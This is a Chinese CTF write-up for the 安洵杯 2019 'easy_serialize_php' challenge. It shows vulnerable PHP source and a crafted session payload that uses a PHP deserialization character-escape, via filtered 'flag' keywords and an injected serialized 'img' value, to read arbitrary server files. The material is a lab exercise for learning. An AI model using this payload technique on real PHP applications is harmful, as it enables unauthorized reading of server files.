[安洵杯 2019]easy_serialize_php

打开后又是源码

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    // implode() 用字符串连接数组
    $filter = '/'.implode('|',$filter_arr).'/i';
    // 即 $filter = /php|flag|php5|php4|fl1g/i
    // 匹配则替换为空
    return preg_replace($filter,'',$img);
}

if($_SESSION){
    // 销毁变量
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

// extract — 从数组中将变量导入到当前的符号表
extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    // sha1 — 计算字符串的sha1散列值，是一种加密方式
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));  // 序列化$_SESSION并过滤

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);  // 反序列化
    echo file_get_contents(base64_decode($userinfo['img']));
} 

既然题目提示$function == 'phpinfo'，那就试一下看看

 发现一个文件d0g3_f1ag.php，尝试读取内容

 看这里

我们可以尝试将guest_img.php改成我们需要的base64编码的d0g3_f1ag.php

这里用到反序列化的字符逃逸，参考文章

https://xz.aliyun.com/t/9213

先写一个PHP获得反序列化后的数组

<?php

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

$_SESSION['user'] = 'flagflagflagflagflagflag';
$_SESSION["function"] = 'A";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:1:"a";s:3:"abc";}';
$_SESSION['img'] = 'aaa';

var_dump(serialize($_SESSION));

$serialize_info = filter(serialize($_SESSION));
var_dump($serialize_info);

?>

然后查看源码发现

$flag = 'flag in /d0g3_fllllllag';

那就继续传/d0g3_fllllllag即可

得到flag